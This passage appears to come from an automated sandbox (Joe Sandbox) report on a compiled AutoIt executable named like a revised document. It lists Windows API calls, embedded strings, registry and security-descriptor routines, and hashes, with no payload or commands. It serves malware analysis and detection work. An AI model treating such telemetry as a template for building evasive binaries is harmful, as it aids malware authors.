                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 000F2A1D
                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 000F2A31
                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 000F2A42
                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 000F2A77
                                        • GetStockObject.GDI32(00000011), ref: 000F2A82
                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 000F2A8D
                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 000F2A97
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                        • API String ID: 2910397461-517079104
                                        • Opcode ID: 3c73a53ebd97400e4b89b1ec3d1c5ef2f655cdf5f2993a0b59c312b8f398983d
                                        • Instruction ID: 8ecd975f8ffd4b879d9480910d1a41e4ac33ba51186e07235a87e2046a8f3de7
                                        • Opcode Fuzzy Hash: 3c73a53ebd97400e4b89b1ec3d1c5ef2f655cdf5f2993a0b59c312b8f398983d
                                        • Instruction Fuzzy Hash: 19B15E75A40209AFDB14DF68CC45FAE7BA9FB09710F008114FA14E76A1D7B4AD80CF94
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 000E4AED
                                        • GetDriveTypeW.KERNEL32(?,0010CB68,?,\\.\,0010CC08), ref: 000E4BCA
                                        • SetErrorMode.KERNEL32(00000000,0010CB68,?,\\.\,0010CC08), ref: 000E4D36
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ErrorMode$DriveType
                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                        • API String ID: 2907320926-4222207086
                                        • Opcode ID: cfa5e64e039998d1bb9f3d957ad34f71b9857361743823604c79c7740cbae77d
                                        • Instruction ID: 980e38a33151195e0229397cf89b996cc3e95876061b071d1b6cd0bb3ff6ff4d
                                        • Opcode Fuzzy Hash: cfa5e64e039998d1bb9f3d957ad34f71b9857361743823604c79c7740cbae77d
                                        • Instruction Fuzzy Hash: 4061AE30705285EFCBA4DF66CA829AC77E1AB04340F34C016F84ABB692DB76ED45DB51
                                        APIs
                                        • GetSysColor.USER32(00000012), ref: 00107421
                                        • SetTextColor.GDI32(?,?), ref: 00107425
                                        • GetSysColorBrush.USER32(0000000F), ref: 0010743B
                                        • GetSysColor.USER32(0000000F), ref: 00107446
                                        • CreateSolidBrush.GDI32(?), ref: 0010744B
                                        • GetSysColor.USER32(00000011), ref: 00107463
                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00107471
                                        • SelectObject.GDI32(?,00000000), ref: 00107482
                                        • SetBkColor.GDI32(?,00000000), ref: 0010748B
                                        • SelectObject.GDI32(?,?), ref: 00107498
                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 001074B7
                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001074CE
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 001074DB
                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0010752A
                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00107554
                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00107572
                                        • DrawFocusRect.USER32(?,?), ref: 0010757D
                                        • GetSysColor.USER32(00000011), ref: 0010758E
                                        • SetTextColor.GDI32(?,00000000), ref: 00107596
                                        • DrawTextW.USER32(?,001070F5,000000FF,?,00000000), ref: 001075A8
                                        • SelectObject.GDI32(?,?), ref: 001075BF
                                        • DeleteObject.GDI32(?), ref: 001075CA
                                        • SelectObject.GDI32(?,?), ref: 001075D0
                                        • DeleteObject.GDI32(?), ref: 001075D5
                                        • SetTextColor.GDI32(?,?), ref: 001075DB
                                        • SetBkColor.GDI32(?,?), ref: 001075E5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                        • String ID:
                                        • API String ID: 1996641542-0
                                        • Opcode ID: f01e60e64d644848a7b2aa764b204204d4d3c4a3d970cedf28259f47dcec3cdb
                                        • Instruction ID: 2b3816afd33bbdbb6792ef2f413ef308c863c4baeac02df5e4313a4fc9577556
                                        • Opcode Fuzzy Hash: f01e60e64d644848a7b2aa764b204204d4d3c4a3d970cedf28259f47dcec3cdb
                                        • Instruction Fuzzy Hash: 61616C76D00218AFDB019FA4DC49AEE7FB9EB09320F114215F951AB2E1D7B1A980CF90
                                        APIs
                                        • GetCursorPos.USER32(?), ref: 00101128
                                        • GetDesktopWindow.USER32 ref: 0010113D
                                        • GetWindowRect.USER32(00000000), ref: 00101144
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00101199
                                        • DestroyWindow.USER32(?), ref: 001011B9
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 001011ED
                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0010120B
                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0010121D
                                        • SendMessageW.USER32(00000000,00000421,?,?), ref: 00101232
                                        • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00101245
                                        • IsWindowVisible.USER32(00000000), ref: 001012A1
                                        • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 001012BC
                                        • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 001012D0
                                        • GetWindowRect.USER32(00000000,?), ref: 001012E8
                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 0010130E
                                        • GetMonitorInfoW.USER32(00000000,?), ref: 00101328
                                        • CopyRect.USER32(?,?), ref: 0010133F
                                        • SendMessageW.USER32(00000000,00000412,00000000), ref: 001013AA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                        • String ID: ($0$tooltips_class32
                                        • API String ID: 698492251-4156429822
                                        • Opcode ID: 9caa81127fb07fd708d532753e0bd7a56895f499d056e89d9b49fd8fd8a2e355
                                        • Instruction ID: 1223873b2397586a821562de9f01ae63f0a5cba2a10420c12dc865c42ff501c5
                                        • Opcode Fuzzy Hash: 9caa81127fb07fd708d532753e0bd7a56895f499d056e89d9b49fd8fd8a2e355
                                        • Instruction Fuzzy Hash: 58B17B71604341AFD714DF64C884BAABBE4FF88754F008918F9D99B2A2CBB5E844CF95
                                        APIs
                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00088968
                                        • GetSystemMetrics.USER32(00000007), ref: 00088970
                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0008899B
                                        • GetSystemMetrics.USER32(00000008), ref: 000889A3
                                        • GetSystemMetrics.USER32(00000004), ref: 000889C8
                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 000889E5
                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 000889F5
                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00088A28
                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00088A3C
                                        • GetClientRect.USER32(00000000,000000FF), ref: 00088A5A
                                        • GetStockObject.GDI32(00000011), ref: 00088A76
                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00088A81
                                          • Part of subcall function 0008912D: GetCursorPos.USER32(?), ref: 00089141
                                          • Part of subcall function 0008912D: ScreenToClient.USER32(00000000,?), ref: 0008915E
                                          • Part of subcall function 0008912D: GetAsyncKeyState.USER32(00000001), ref: 00089183
                                          • Part of subcall function 0008912D: GetAsyncKeyState.USER32(00000002), ref: 0008919D
                                        • SetTimer.USER32(00000000,00000000,00000028,000890FC), ref: 00088AA8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                        • String ID: AutoIt v3 GUI
                                        • API String ID: 1458621304-248962490
                                        • Opcode ID: 7ab56b2af803778b7214792e4a83518f2b93566fdeabdd4304536db9ae666348
                                        • Instruction ID: 3d7e5d06ab51afb6a881e95b03993b7d87d3bbe202131fe8d6da88b98822573e
                                        • Opcode Fuzzy Hash: 7ab56b2af803778b7214792e4a83518f2b93566fdeabdd4304536db9ae666348
                                        • Instruction Fuzzy Hash: 8DB18F75A0020AEFDF24DF68CC45BAE7BB5FB48314F104229FA55A72A0DB71A881CF51
                                        APIs
                                          • Part of subcall function 000D10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 000D1114
                                          • Part of subcall function 000D10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,000D0B9B,?,?,?), ref: 000D1120
                                          • Part of subcall function 000D10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,000D0B9B,?,?,?), ref: 000D112F
                                          • Part of subcall function 000D10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,000D0B9B,?,?,?), ref: 000D1136
                                          • Part of subcall function 000D10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 000D114D
                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 000D0DF5
                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 000D0E29
                                        • GetLengthSid.ADVAPI32(?), ref: 000D0E40
                                        • GetAce.ADVAPI32(?,00000000,?), ref: 000D0E7A
                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 000D0E96
                                        • GetLengthSid.ADVAPI32(?), ref: 000D0EAD
                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 000D0EB5
                                        • HeapAlloc.KERNEL32(00000000), ref: 000D0EBC
                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 000D0EDD
                                        • CopySid.ADVAPI32(00000000), ref: 000D0EE4
                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 000D0F13
                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 000D0F35
                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 000D0F47
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000D0F6E
                                        • HeapFree.KERNEL32(00000000), ref: 000D0F75
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000D0F7E
                                        • HeapFree.KERNEL32(00000000), ref: 000D0F85
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000D0F8E
                                        • HeapFree.KERNEL32(00000000), ref: 000D0F95
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 000D0FA1
                                        • HeapFree.KERNEL32(00000000), ref: 000D0FA8
                                          • Part of subcall function 000D1193: GetProcessHeap.KERNEL32(00000008,000D0BB1,?,00000000,?,000D0BB1,?), ref: 000D11A1
                                          • Part of subcall function 000D1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,000D0BB1,?), ref: 000D11A8
                                          • Part of subcall function 000D1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,000D0BB1,?), ref: 000D11B7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                        • String ID:
                                        • API String ID: 4175595110-0
                                        • Opcode ID: da414dacd83755c064f68ec0a83a152aed9e6585a28ca4d964efb54534c051dc
                                        • Instruction ID: b6df776bd80b682c47bfc326190c1d6c2acda97d2f770b36e08de8a794dd7880
                                        • Opcode Fuzzy Hash: da414dacd83755c064f68ec0a83a152aed9e6585a28ca4d964efb54534c051dc
                                        • Instruction Fuzzy Hash: 25714C7290030AEBDF609FA5DC48BEEBBB8BF04310F144226F959A6691D7719945CFB0
                                        APIs
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000FC4BD
                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,0010CC08,00000000,?,00000000,?,?), ref: 000FC544
                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 000FC5A4
                                        • _wcslen.LIBCMT ref: 000FC5F4
                                        • _wcslen.LIBCMT ref: 000FC66F
                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 000FC6B2
                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 000FC7C1
                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 000FC84D
                                        • RegCloseKey.ADVAPI32(?), ref: 000FC881
                                        • RegCloseKey.ADVAPI32(00000000), ref: 000FC88E
                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 000FC960
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                        • API String ID: 9721498-966354055
                                        APIs
                                        • CharUpperBuffW.USER32(?,?), ref: 001009C6
                                        • _wcslen.LIBCMT ref: 00100A01
                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00100A54
                                        • _wcslen.LIBCMT ref: 00100A8A
                                        • _wcslen.LIBCMT ref: 00100B06
                                        • _wcslen.LIBCMT ref: 00100B81
                                          • Part of subcall function 0008F9F2: _wcslen.LIBCMT ref: 0008F9FD
                                          • Part of subcall function 000D2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 000D2BFA
                                        Similarity
                                        • API ID: _wcslen$MessageSend$BuffCharUpper
                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                        • API String ID: 1103490817-4258414348
                                        APIs
                                        Similarity
                                        • API ID: _wcslen$BuffCharUpper
                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                        • API String ID: 1256254125-909552448
                                        APIs
                                        • _wcslen.LIBCMT ref: 0010835A
                                        • _wcslen.LIBCMT ref: 0010836E
                                        • _wcslen.LIBCMT ref: 00108391
                                        • _wcslen.LIBCMT ref: 001083B4
                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 001083F2
                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,0010361A,?), ref: 0010844E
                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00108487
                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 001084CA
                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00108501
                                        • FreeLibrary.KERNEL32(?), ref: 0010850D
                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0010851D
                                        • DestroyIcon.USER32(?), ref: 0010852C
                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00108549
                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00108555
                                        Similarity
                                        • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                        • String ID: .dll$.exe$.icl
                                        • API String ID: 799131459-1154884017
                                        Similarity
                                        • API ID:
                                        • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                        • API String ID: 0-1645009161
                                        APIs
                                        • LoadIconW.USER32(00000063), ref: 000D5A2E
                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 000D5A40
                                        • SetWindowTextW.USER32(?,?), ref: 000D5A57
                                        • GetDlgItem.USER32(?,000003EA), ref: 000D5A6C
                                        • SetWindowTextW.USER32(00000000,?), ref: 000D5A72
                                        • GetDlgItem.USER32(?,000003E9), ref: 000D5A82
                                        • SetWindowTextW.USER32(00000000,?), ref: 000D5A88
                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 000D5AA9
                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 000D5AC3
                                        • GetWindowRect.USER32(?,?), ref: 000D5ACC
                                        • _wcslen.LIBCMT ref: 000D5B33
                                        • SetWindowTextW.USER32(?,?), ref: 000D5B6F
                                        • GetDesktopWindow.USER32 ref: 000D5B75
                                        • GetWindowRect.USER32(00000000), ref: 000D5B7C
                                        • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 000D5BD3
                                        • GetClientRect.USER32(?,?), ref: 000D5BE0
                                        • PostMessageW.USER32(?,00000005,00000000,?), ref: 000D5C05
                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 000D5C2F
                                        Similarity
                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                        • String ID:
                                        • API String ID: 895679908-0
                                        APIs
                                        • LoadCursorW.USER32(00000000,00007F89), ref: 000EFE27
                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 000EFE32
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 000EFE3D
                                        • LoadCursorW.USER32(00000000,00007F03), ref: 000EFE48
                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 000EFE53
                                        • LoadCursorW.USER32(00000000,00007F01), ref: 000EFE5E
                                        • LoadCursorW.USER32(00000000,00007F81), ref: 000EFE69
                                        • LoadCursorW.USER32(00000000,00007F88), ref: 000EFE74
                                        • LoadCursorW.USER32(00000000,00007F80), ref: 000EFE7F
                                        • LoadCursorW.USER32(00000000,00007F86), ref: 000EFE8A
                                        • LoadCursorW.USER32(00000000,00007F83), ref: 000EFE95
                                        • LoadCursorW.USER32(00000000,00007F85), ref: 000EFEA0
                                        • LoadCursorW.USER32(00000000,00007F82), ref: 000EFEAB
                                        • LoadCursorW.USER32(00000000,00007F84), ref: 000EFEB6
                                        • LoadCursorW.USER32(00000000,00007F04), ref: 000EFEC1
                                        • LoadCursorW.USER32(00000000,00007F02), ref: 000EFECC
                                        • GetCursorInfo.USER32(?), ref: 000EFEDC
                                        • GetLastError.KERNEL32 ref: 000EFF1E
                                        Similarity
                                        • API ID: Cursor$Load$ErrorInfoLast
                                        • String ID:
                                        • API String ID: 3215588206-0
                                        APIs
                                        • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 000900C6
                                          • Part of subcall function 000900ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0014070C,00000FA0,7C14CC77,?,?,?,?,000B23B3,000000FF), ref: 0009011C
                                          • Part of subcall function 000900ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,000B23B3,000000FF), ref: 00090127
                                          • Part of subcall function 000900ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,000B23B3,000000FF), ref: 00090138
                                          • Part of subcall function 000900ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0009014E
                                          • Part of subcall function 000900ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0009015C
                                          • Part of subcall function 000900ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0009016A
                                          • Part of subcall function 000900ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00090195
                                          • Part of subcall function 000900ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 000901A0
                                        • ___scrt_fastfail.LIBCMT ref: 000900E7
                                          • Part of subcall function 000900A3: __onexit.LIBCMT ref: 000900A9
                                        Strings
                                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00090122
                                        • SleepConditionVariableCS, xrefs: 00090154
                                        • WakeAllConditionVariable, xrefs: 00090162
                                        • InitializeConditionVariable, xrefs: 00090148
                                        • kernel32.dll, xrefs: 00090133
                                        Similarity
                                        • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                        • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                        • API String ID: 66158676-1714406822
                                        APIs
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                        • API String ID: 176396367-1603158881
                                        APIs
                                        • CharLowerBuffW.USER32(00000000,00000000,0010CC08), ref: 000E4527
                                        • _wcslen.LIBCMT ref: 000E453B
                                        • _wcslen.LIBCMT ref: 000E4599
                                        • _wcslen.LIBCMT ref: 000E45F4
                                        • _wcslen.LIBCMT ref: 000E463F
                                        • _wcslen.LIBCMT ref: 000E46A7
                                          • Part of subcall function 0008F9F2: _wcslen.LIBCMT ref: 0008F9FD
                                        • GetDriveTypeW.KERNEL32(?,00136BF0,00000061), ref: 000E4743
                                        Similarity
                                        • API ID: _wcslen$BuffCharDriveLowerType
                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                        • API String ID: 2055661098-1000479233
                                        APIs
                                        • _wcslen.LIBCMT ref: 000FB198
                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 000FB1B0
                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 000FB1D4
                                        • _wcslen.LIBCMT ref: 000FB200
                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 000FB214
                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 000FB236
                                        • _wcslen.LIBCMT ref: 000FB332
                                          • Part of subcall function 000E05A7: GetStdHandle.KERNEL32(000000F6), ref: 000E05C6
                                        • _wcslen.LIBCMT ref: 000FB34B
                                        • _wcslen.LIBCMT ref: 000FB366
                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 000FB3B6
                                        • GetLastError.KERNEL32(00000000), ref: 000FB407
                                        • CloseHandle.KERNEL32(?), ref: 000FB439
                                        • CloseHandle.KERNEL32(00000000), ref: 000FB44A
                                        • CloseHandle.KERNEL32(00000000), ref: 000FB45C
                                        • CloseHandle.KERNEL32(00000000), ref: 000FB46E
                                        • CloseHandle.KERNEL32(?), ref: 000FB4E3
                                        Similarity
                                        • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                        • String ID:
                                        • API String ID: 2178637699-0
                                        APIs
                                        • GetMenuItemCount.USER32(00141990), ref: 000B2F8D
                                        • GetMenuItemCount.USER32(00141990), ref: 000B303D
                                        • GetCursorPos.USER32(?), ref: 000B3081
                                        • SetForegroundWindow.USER32(00000000), ref: 000B308A
                                        • TrackPopupMenuEx.USER32(00141990,00000000,?,00000000,00000000,00000000), ref: 000B309D
                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 000B30A9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                        • String ID: 0
                                        • API String ID: 36266755-4108050209
